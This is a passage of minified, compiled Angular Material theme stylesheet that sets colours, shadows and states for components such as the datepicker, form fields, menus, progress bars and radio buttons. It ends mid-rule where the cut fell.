mat-footer-row[_ngcontent-%COMP%], th.mat-header-cell[_ngcontent-%COMP%], td.mat-cell[_ngcontent-%COMP%], td.mat-footer-cell[_ngcontent-%COMP%]{border-bottom-color:#0000001f}.mat-header-cell[_ngcontent-%COMP%]{color:#0000008a}.mat-cell[_ngcontent-%COMP%], .mat-footer-cell[_ngcontent-%COMP%]{color:#000000de}.mat-calendar-arrow[_ngcontent-%COMP%]{fill:#0000008a}.mat-datepicker-toggle[_ngcontent-%COMP%], .mat-datepicker-content[_ngcontent-%COMP%] .mat-calendar-next-button[_ngcontent-%COMP%], .mat-datepicker-content[_ngcontent-%COMP%] .mat-calendar-previous-button[_ngcontent-%COMP%]{color:#0000008a}.mat-calendar-table-header-divider[_ngcontent-%COMP%]:after{background:rgba(0,0,0,.12)}.mat-calendar-table-header[_ngcontent-%COMP%], .mat-calendar-body-label[_ngcontent-%COMP%]{color:#0000008a}.mat-calendar-body-cell-content[_ngcontent-%COMP%], .mat-date-range-input-separator[_ngcontent-%COMP%]{color:#000000de;border-color:transparent}.mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){color:#00000061}.mat-form-field-disabled[_ngcontent-%COMP%] .mat-date-range-input-separator[_ngcontent-%COMP%]{color:#00000061}.mat-calendar-body-in-preview[_ngcontent-%COMP%]{color:#0000003d}.mat-calendar-body-today[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){border-color:#00000061}.mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-today[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){border-color:#0000002e}.mat-calendar-body-in-range[_ngcontent-%COMP%]:before{background:rgba(33,150,243,.2)}.mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%]:before{background:rgba(249,171,0,.2)}.mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before, [dir=rtl][_ngcontent-%COMP%] .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before{background:linear-gradient(to right,rgba(33,150,243,.2) 50%,rgba(249,171,0,.2) 50%)}.mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before, [dir=rtl][_ngcontent-%COMP%] .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before{background:linear-gradient(to left,rgba(33,150,243,.2) 50%,rgba(249,171,0,.2) 50%)}.mat-calendar-body-in-range[_ngcontent-%COMP%] > .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .mat-calendar-body-in-comparison-range.mat-calendar-body-in-range[_ngcontent-%COMP%]:after{background:#a8dab5}.mat-calendar-body-comparison-identical.mat-calendar-body-selected[_ngcontent-%COMP%], .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background:#46a35e}.mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#2196f3;color:#fff}.mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#2196f366}.mat-calendar-body-today.mat-calendar-body-selected[_ngcontent-%COMP%]{box-shadow:inset 0 0 0 1px #fff}.cdk-keyboard-focused[_ngcontent-%COMP%] .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical), .cdk-program-focused[_ngcontent-%COMP%] .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#2196f34d}@media (hover: hover){.mat-calendar-body-cell[_ngcontent-%COMP%]:not(.mat-calendar-body-disabled):hover > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#2196f34d}}.mat-datepicker-content[_ngcontent-%COMP%]{box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f;background-color:#fff;color:#000000de}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-in-range[_ngcontent-%COMP%]:before{background:rgba(123,31,162,.2)}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%]:before{background:rgba(249,171,0,.2)}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before, .mat-datepicker-content.mat-accent[_ngcontent-%COMP%] [dir=rtl][_ngcontent-%COMP%] .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before{background:linear-gradient(to right,rgba(123,31,162,.2) 50%,rgba(249,171,0,.2) 50%)}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before, .mat-datepicker-content.mat-accent[_ngcontent-%COMP%] [dir=rtl][_ngcontent-%COMP%] .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before{background:linear-gradient(to left,rgba(123,31,162,.2) 50%,rgba(249,171,0,.2) 50%)}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-in-range[_ngcontent-%COMP%] > .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-in-comparison-range.mat-calendar-body-in-range[_ngcontent-%COMP%]:after{background:#a8dab5}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-comparison-identical.mat-calendar-body-selected[_ngcontent-%COMP%], .mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background:#46a35e}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#7b1fa2;color:#fff}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#7b1fa266}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-today.mat-calendar-body-selected[_ngcontent-%COMP%]{box-shadow:inset 0 0 0 1px #fff}.mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .cdk-keyboard-focused[_ngcontent-%COMP%] .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical), .mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .cdk-program-focused[_ngcontent-%COMP%] .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#7b1fa24d}@media (hover: hover){.mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-cell[_ngcontent-%COMP%]:not(.mat-calendar-body-disabled):hover > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#7b1fa24d}}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-in-range[_ngcontent-%COMP%]:before{background:rgba(244,67,54,.2)}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%]:before{background:rgba(249,171,0,.2)}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before, .mat-datepicker-content.mat-warn[_ngcontent-%COMP%] [dir=rtl][_ngcontent-%COMP%] .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before{background:linear-gradient(to right,rgba(244,67,54,.2) 50%,rgba(249,171,0,.2) 50%)}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before, .mat-datepicker-content.mat-warn[_ngcontent-%COMP%] [dir=rtl][_ngcontent-%COMP%] .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before{background:linear-gradient(to left,rgba(244,67,54,.2) 50%,rgba(249,171,0,.2) 50%)}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-in-range[_ngcontent-%COMP%] > .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-in-comparison-range.mat-calendar-body-in-range[_ngcontent-%COMP%]:after{background:#a8dab5}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-comparison-identical.mat-calendar-body-selected[_ngcontent-%COMP%], .mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background:#46a35e}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#f44336;color:#fff}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#f4433666}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-today.mat-calendar-body-selected[_ngcontent-%COMP%]{box-shadow:inset 0 0 0 1px #fff}.mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .cdk-keyboard-focused[_ngcontent-%COMP%] .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical), .mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .cdk-program-focused[_ngcontent-%COMP%] .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#f443364d}@media (hover: hover){.mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-cell[_ngcontent-%COMP%]:not(.mat-calendar-body-disabled):hover > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#f443364d}}.mat-datepicker-content-touch[_ngcontent-%COMP%]{box-shadow:0 11px 15px -7px #0003,0 24px 38px 3px #00000024,0 9px 46px 8px #0000001f}.mat-datepicker-toggle-active[_ngcontent-%COMP%]{color:#2196f3}.mat-datepicker-toggle-active.mat-accent[_ngcontent-%COMP%]{color:#7b1fa2}.mat-datepicker-toggle-active.mat-warn[_ngcontent-%COMP%]{color:#f44336}.mat-date-range-input-inner[disabled][_ngcontent-%COMP%]{color:#00000061}.mat-dialog-container[_ngcontent-%COMP%]{box-shadow:0 11px 15px -7px #0003,0 24px 38px 3px #00000024,0 9px 46px 8px #0000001f;background:white;color:#000000de}.mat-divider[_ngcontent-%COMP%]{border-top-color:#0000001f}.mat-divider-vertical[_ngcontent-%COMP%]{border-right-color:#0000001f}.mat-expansion-panel[_ngcontent-%COMP%]{background:white;color:#000000de}.mat-expansion-panel[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 3px 1px -2px #0003,0 2px 2px #00000024,0 1px 5px #0000001f}.mat-action-row[_ngcontent-%COMP%]{border-top-color:#0000001f}.mat-expansion-panel[_ngcontent-%COMP%] .mat-expansion-panel-header.cdk-keyboard-focused[_ngcontent-%COMP%]:not([aria-disabled=true]), .mat-expansion-panel[_ngcontent-%COMP%] .mat-expansion-panel-header.cdk-program-focused[_ngcontent-%COMP%]:not([aria-disabled=true]), .mat-expansion-panel[_ngcontent-%COMP%]:not(.mat-expanded) .mat-expansion-panel-header[_ngcontent-%COMP%]:hover:not([aria-disabled=true]){background:rgba(0,0,0,.04)}@media (hover: none){.mat-expansion-panel[_ngcontent-%COMP%]:not(.mat-expanded):not([aria-disabled=true]) .mat-expansion-panel-header[_ngcontent-%COMP%]:hover{background:white}}.mat-expansion-panel-header-title[_ngcontent-%COMP%]{color:#000000de}.mat-expansion-panel-header-description[_ngcontent-%COMP%], .mat-expansion-indicator[_ngcontent-%COMP%]:after{color:#0000008a}.mat-expansion-panel-header[aria-disabled=true][_ngcontent-%COMP%]{color:#00000042}.mat-expansion-panel-header[aria-disabled=true][_ngcontent-%COMP%] .mat-expansion-panel-header-title[_ngcontent-%COMP%], .mat-expansion-panel-header[aria-disabled=true][_ngcontent-%COMP%] .mat-expansion-panel-header-description[_ngcontent-%COMP%]{color:inherit}.mat-expansion-panel-header[_ngcontent-%COMP%]{height:48px}.mat-expansion-panel-header.mat-expanded[_ngcontent-%COMP%]{height:64px}.mat-form-field-label[_ngcontent-%COMP%], .mat-hint[_ngcontent-%COMP%]{color:#0009}.mat-form-field.mat-focused[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%]{color:#2196f3}.mat-form-field.mat-focused[_ngcontent-%COMP%] .mat-form-field-label.mat-accent[_ngcontent-%COMP%]{color:#7b1fa2}.mat-form-field.mat-focused[_ngcontent-%COMP%] .mat-form-field-label.mat-warn[_ngcontent-%COMP%]{color:#f44336}.mat-focused[_ngcontent-%COMP%] .mat-form-field-required-marker[_ngcontent-%COMP%]{color:#7b1fa2}.mat-form-field-ripple[_ngcontent-%COMP%]{background-color:#000000de}.mat-form-field.mat-focused[_ngcontent-%COMP%] .mat-form-field-ripple[_ngcontent-%COMP%]{background-color:#2196f3}.mat-form-field.mat-focused[_ngcontent-%COMP%] .mat-form-field-ripple.mat-accent[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-form-field.mat-focused[_ngcontent-%COMP%] .mat-form-field-ripple.mat-warn[_ngcontent-%COMP%]{background-color:#f44336}.mat-form-field-type-mat-native-select.mat-focused[_ngcontent-%COMP%]:not(.mat-form-field-invalid) .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#2196f3}.mat-form-field-type-mat-native-select.mat-focused[_ngcontent-%COMP%]:not(.mat-form-field-invalid).mat-accent .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#7b1fa2}.mat-form-field-type-mat-native-select.mat-focused[_ngcontent-%COMP%]:not(.mat-form-field-invalid).mat-warn .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#f44336}.mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%], .mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%] .mat-form-field-label.mat-accent[_ngcontent-%COMP%], .mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%] .mat-form-field-required-marker[_ngcontent-%COMP%]{color:#f44336}.mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%] .mat-form-field-ripple[_ngcontent-%COMP%], .mat-form-field.mat-form-field-invalid[_ngcontent-%COMP%] .mat-form-field-ripple.mat-accent[_ngcontent-%COMP%]{background-color:#f44336}.mat-error[_ngcontent-%COMP%]{color:#f44336}.mat-form-field-appearance-legacy[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%], .mat-form-field-appearance-legacy[_ngcontent-%COMP%] .mat-hint[_ngcontent-%COMP%]{color:#0000008a}.mat-form-field-appearance-legacy[_ngcontent-%COMP%] .mat-form-field-underline[_ngcontent-%COMP%]{background-color:#0000006b}.mat-form-field-appearance-legacy.mat-form-field-disabled[_ngcontent-%COMP%] .mat-form-field-underline[_ngcontent-%COMP%]{background-image:linear-gradient(to right,rgba(0,0,0,.42) 0%,rgba(0,0,0,.42) 33%,transparent 0%);background-size:4px 100%;background-repeat:repeat-x}.mat-form-field-appearance-standard[_ngcontent-%COMP%] .mat-form-field-underline[_ngcontent-%COMP%]{background-color:#0000006b}.mat-form-field-appearance-standard.mat-form-field-disabled[_ngcontent-%COMP%] .mat-form-field-underline[_ngcontent-%COMP%]{background-image:linear-gradient(to right,rgba(0,0,0,.42) 0%,rgba(0,0,0,.42) 33%,transparent 0%);background-size:4px 100%;background-repeat:repeat-x}.mat-form-field-appearance-fill[_ngcontent-%COMP%] .mat-form-field-flex[_ngcontent-%COMP%]{background-color:#0000000a}.mat-form-field-appearance-fill.mat-form-field-disabled[_ngcontent-%COMP%] .mat-form-field-flex[_ngcontent-%COMP%]{background-color:#00000005}.mat-form-field-appearance-fill[_ngcontent-%COMP%] .mat-form-field-underline[_ngcontent-%COMP%]:before{background-color:#0000006b}.mat-form-field-appearance-fill.mat-form-field-disabled[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%]{color:#00000061}.mat-form-field-appearance-fill.mat-form-field-disabled[_ngcontent-%COMP%] .mat-form-field-underline[_ngcontent-%COMP%]:before{background-color:transparent}.mat-form-field-appearance-outline[_ngcontent-%COMP%] .mat-form-field-outline[_ngcontent-%COMP%]{color:#0000001f}.mat-form-field-appearance-outline[_ngcontent-%COMP%] .mat-form-field-outline-thick[_ngcontent-%COMP%]{color:#000000de}.mat-form-field-appearance-outline.mat-focused[_ngcontent-%COMP%] .mat-form-field-outline-thick[_ngcontent-%COMP%]{color:#2196f3}.mat-form-field-appearance-outline.mat-focused.mat-accent[_ngcontent-%COMP%] .mat-form-field-outline-thick[_ngcontent-%COMP%]{color:#7b1fa2}.mat-form-field-appearance-outline.mat-focused.mat-warn[_ngcontent-%COMP%] .mat-form-field-outline-thick[_ngcontent-%COMP%], .mat-form-field-appearance-outline.mat-form-field-invalid.mat-form-field-invalid[_ngcontent-%COMP%] .mat-form-field-outline-thick[_ngcontent-%COMP%]{color:#f44336}.mat-form-field-appearance-outline.mat-form-field-disabled[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%]{color:#00000061}.mat-form-field-appearance-outline.mat-form-field-disabled[_ngcontent-%COMP%] .mat-form-field-outline[_ngcontent-%COMP%]{color:#0000000f}.mat-icon.mat-primary[_ngcontent-%COMP%]{color:#2196f3}.mat-icon.mat-accent[_ngcontent-%COMP%]{color:#7b1fa2}.mat-icon.mat-warn[_ngcontent-%COMP%]{color:#f44336}.mat-form-field-type-mat-native-select[_ngcontent-%COMP%] .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#0000008a}.mat-input-element[_ngcontent-%COMP%]:disabled, .mat-form-field-type-mat-native-select.mat-form-field-disabled[_ngcontent-%COMP%] .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#00000061}.mat-input-element[_ngcontent-%COMP%]{caret-color:#2196f3}.mat-input-element[_ngcontent-%COMP%]::placeholder{color:#0000006b}.mat-input-element[_ngcontent-%COMP%]::-moz-placeholder{color:#0000006b}.mat-input-element[_ngcontent-%COMP%]::-webkit-input-placeholder{color:#0000006b}.mat-input-element[_ngcontent-%COMP%]:-ms-input-placeholder{color:#0000006b}.mat-form-field.mat-accent[_ngcontent-%COMP%] .mat-input-element[_ngcontent-%COMP%]{caret-color:#7b1fa2}.mat-form-field.mat-warn[_ngcontent-%COMP%] .mat-input-element[_ngcontent-%COMP%], .mat-form-field-invalid[_ngcontent-%COMP%] .mat-input-element[_ngcontent-%COMP%]{caret-color:#f44336}.mat-form-field-type-mat-native-select.mat-form-field-invalid[_ngcontent-%COMP%] .mat-form-field-infix[_ngcontent-%COMP%]:after{color:#f44336}.mat-list-base[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%], .mat-list-base[_ngcontent-%COMP%] .mat-list-option[_ngcontent-%COMP%]{color:#000000de}.mat-list-base[_ngcontent-%COMP%] .mat-subheader[_ngcontent-%COMP%]{color:#0000008a}.mat-list-base[_ngcontent-%COMP%] .mat-list-item-disabled[_ngcontent-%COMP%]{background-color:#eee;color:#00000061}.mat-list-option[_ngcontent-%COMP%]:hover, .mat-list-option[_ngcontent-%COMP%]:focus, .mat-nav-list[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%]:hover, .mat-nav-list[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%]:focus, .mat-action-list[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%]:hover, .mat-action-list[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%]:focus{background:rgba(0,0,0,.04)}.mat-list-single-selected-option[_ngcontent-%COMP%], .mat-list-single-selected-option[_ngcontent-%COMP%]:hover, .mat-list-single-selected-option[_ngcontent-%COMP%]:focus{background:rgba(0,0,0,.12)}.mat-menu-panel[_ngcontent-%COMP%]{background:white}.mat-menu-panel[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f}.mat-menu-item[_ngcontent-%COMP%]{background:transparent;color:#000000de}.mat-menu-item[disabled][_ngcontent-%COMP%], .mat-menu-item[disabled][_ngcontent-%COMP%] .mat-menu-submenu-icon[_ngcontent-%COMP%], .mat-menu-item[disabled][_ngcontent-%COMP%] .mat-icon-no-color[_ngcontent-%COMP%]{color:#00000061}.mat-menu-item[_ngcontent-%COMP%] .mat-icon-no-color[_ngcontent-%COMP%], .mat-menu-submenu-icon[_ngcontent-%COMP%]{color:#0000008a}.mat-menu-item[_ngcontent-%COMP%]:hover:not([disabled]), .mat-menu-item.cdk-program-focused[_ngcontent-%COMP%]:not([disabled]), .mat-menu-item.cdk-keyboard-focused[_ngcontent-%COMP%]:not([disabled]), .mat-menu-item-highlighted[_ngcontent-%COMP%]:not([disabled]){background:rgba(0,0,0,.04)}.mat-paginator[_ngcontent-%COMP%]{background:white}.mat-paginator[_ngcontent-%COMP%], .mat-paginator-page-size[_ngcontent-%COMP%] .mat-select-trigger[_ngcontent-%COMP%]{color:#0000008a}.mat-paginator-decrement[_ngcontent-%COMP%], .mat-paginator-increment[_ngcontent-%COMP%]{border-top:2px solid rgba(0,0,0,.54);border-right:2px solid rgba(0,0,0,.54)}.mat-paginator-first[_ngcontent-%COMP%], .mat-paginator-last[_ngcontent-%COMP%]{border-top:2px solid rgba(0,0,0,.54)}.mat-icon-button[disabled][_ngcontent-%COMP%] .mat-paginator-decrement[_ngcontent-%COMP%], .mat-icon-button[disabled][_ngcontent-%COMP%] .mat-paginator-increment[_ngcontent-%COMP%], .mat-icon-button[disabled][_ngcontent-%COMP%] .mat-paginator-first[_ngcontent-%COMP%], .mat-icon-button[disabled][_ngcontent-%COMP%] .mat-paginator-last[_ngcontent-%COMP%]{border-color:#00000061}.mat-paginator-container[_ngcontent-%COMP%]{min-height:56px}.mat-progress-bar-background[_ngcontent-%COMP%]{fill:#c0ddf5}.mat-progress-bar-buffer[_ngcontent-%COMP%]{background-color:#c0ddf5}.mat-progress-bar-fill[_ngcontent-%COMP%]:after{background-color:#2196f3}.mat-progress-bar.mat-accent[_ngcontent-%COMP%] .mat-progress-bar-background[_ngcontent-%COMP%]{fill:#d7c0e0}.mat-progress-bar.mat-accent[_ngcontent-%COMP%] .mat-progress-bar-buffer[_ngcontent-%COMP%]{background-color:#d7c0e0}.mat-progress-bar.mat-accent[_ngcontent-%COMP%] .mat-progress-bar-fill[_ngcontent-%COMP%]:after{background-color:#7b1fa2}.mat-progress-bar.mat-warn[_ngcontent-%COMP%] .mat-progress-bar-background[_ngcontent-%COMP%]{fill:#f5c9c5}.mat-progress-bar.mat-warn[_ngcontent-%COMP%] .mat-progress-bar-buffer[_ngcontent-%COMP%]{background-color:#f5c9c5}.mat-progress-bar.mat-warn[_ngcontent-%COMP%] .mat-progress-bar-fill[_ngcontent-%COMP%]:after{background-color:#f44336}.mat-progress-spinner[_ngcontent-%COMP%] circle[_ngcontent-%COMP%], .mat-spinner[_ngcontent-%COMP%] circle[_ngcontent-%COMP%]{stroke:#2196f3}.mat-progress-spinner.mat-accent[_ngcontent-%COMP%] circle[_ngcontent-%COMP%], .mat-spinner.mat-accent[_ngcontent-%COMP%] circle[_ngcontent-%COMP%]{stroke:#7b1fa2}.mat-progress-spinner.mat-warn[_ngcontent-%COMP%] circle[_ngcontent-%COMP%], .mat-spinner.mat-warn[_ngcontent-%COMP%] circle[_ngcontent-%COMP%]{stroke:#f44336}.mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#0000008a}.mat-radio-button.mat-primary.mat-radio-checked[_ngcontent-%COMP%] .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#2196f3}.mat-radio-button.mat-primary[_ngcontent-%COMP%] .mat-radio-inner-circle[_ngcontent-%COMP%], .mat-radio-button.mat-primary[_ngcontent-%COMP%] .mat-radio-ripple[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]:not(.mat-radio-persistent-ripple), .mat-radio-button.mat-primary.mat-radio-checked[_ngcontent-%COMP%] .mat-radio-persistent-ripple[_ngcontent-%COMP%], .mat-radio-button.mat-primary[_ngcontent-%COMP%]:active .mat-radio-persistent-ripple[_ngcontent-%COMP%]{background-color:#2196f3}.mat-radio-button.mat-accent.mat-radio-checked[_ngcontent-%COMP%] .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#7b1fa2}.mat-radio-button.mat-accent[_ngcontent-%COMP%] .mat-radio-inner-circle[_ngcontent-%COMP%], .mat-radio-button.mat-accent[_ngcontent-%COMP%] .mat-radio-ripple[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]:not(.mat-radio-persistent-ripple), .mat-radio-button.mat-accent.mat-radio-checked[_ngcontent-%COMP%] .mat-radio-persistent-ripple[_ngcontent-%COMP%], .mat-radio-button.mat-accent[_ngcontent-%COMP%]:active .mat-radio-persistent-ripple[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-radio-button.mat-warn.mat-radio-checked[_ngcontent-%COMP%] .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#f44336}.mat-radio-button.mat-warn[_ngcontent-%COMP%] .mat-radio-inner-circle[_ngcontent-%COMP%], .mat-radio-button.mat-warn[_ngcontent-%COMP%] .mat-radio-ripple[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]:not(.mat-radio-persistent-ripple), .mat-radio-button.mat-warn.mat-radio-checked[_ngcontent-%COMP%] .mat-radio-persistent-ripple[_ngcontent-%COMP%], .mat-radio-button.mat-warn[_ngcontent-%COMP%]:active .mat-radio-persistent-ripple[_ngcontent-%COMP%]{background-color:#f44336}.mat-radio-button.mat-radio-disabled.mat-radio-checked[_ngcontent-%COMP%] .mat-radio-outer-circle[_ngcontent-%COMP%], .mat-radio-button.mat-radio-disabled[_ngcontent-%COMP%] .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#00000061}.mat-radio-button.mat-radio-disabled[_ngcontent-%COMP%] .mat-radio-ripple[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .mat-radio-button.mat-radio-disabled[_ngcontent-%COMP%] .mat-radio-inner-circle[_ngcontent-%COMP%]{background-color:#00000061}.mat-radio-button.mat-radio-disabled[_ngcontent-%COMP%] .mat-radio-label-content[_ngcontent-%COMP%]{color:#00000061}.mat-radio-button[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#000}.mat-select-value[_ngcontent-%COMP%]{color:#000000de}.mat-select-placeholder[_ngcontent-%COMP%]{color:#0000006b}.mat-select-disabled[_ngcontent-%COMP%] .mat-select-value[_ngcontent-%COMP%]{color:#00000061}.mat-select-arrow[_ngcontent-%COMP%]{color:#0000008a}.mat-select-panel[_ngcontent-%COMP%]{background:white}.mat-select-panel[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f}.mat-select-panel[_ngcontent-%COMP%] .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-multiple){background:rgba(0,0,0,.12)}.mat-form-field.mat-focused.mat-primary[_ngcontent-%COMP%] .mat-select-arrow[_ngcontent-%COMP%]{color:#2196f3}.mat-form-field.mat-focused.mat-accent[_ngcontent-%COMP%] .mat-select-arrow[_ngcontent-%COMP%]{color:#7b1fa2}.mat-form-field.mat-focused.mat-warn[_ngcontent-%COMP%] .mat-select-arrow[_ngcontent-%COMP%], .mat-form-field[_ngcontent-%COMP%] .mat-select.mat-select-invalid[_ngcontent-%COMP%] .mat-select-arrow[_ngcontent-%COMP%]{color:#f44336}.mat-form-field[_ngcontent-%COMP%] .mat-select.mat-select-disabled[_ngcontent-%COMP%] .mat-select-arrow[_ngcontent-%COMP%]{color:#00000061}.mat-drawer-container[_ngcontent-%COMP%]{background-color:#f5f5f5;color:#000000de}.mat-drawer[_ngcontent-%COMP%]{background-color:#fff;color:#000000de}.mat-drawer.mat-drawer-push[_ngcontent-%COMP%]{background-color:#fff}.mat-drawer[_ngcontent-%COMP%]:not(.mat-drawer-side){box-shadow:0 8px 10px -5px #0003,0 16px 24px 2px #00000024,0 6px 30px 5px #0000001f}.mat-drawer-side[_ngcontent-%COMP%]{border-right:solid 1px rgba(0,0,0,.12)}.mat-drawer-side.mat-drawer-end[_ngcontent-%COMP%], [dir=rtl][_ngcontent-%COMP%] .mat-drawer-side[_ngcontent-%COMP%]{border-left:solid 1px rgba(0,0,0,.12);border-right:none}[dir=rtl][_ngcontent-%COMP%] 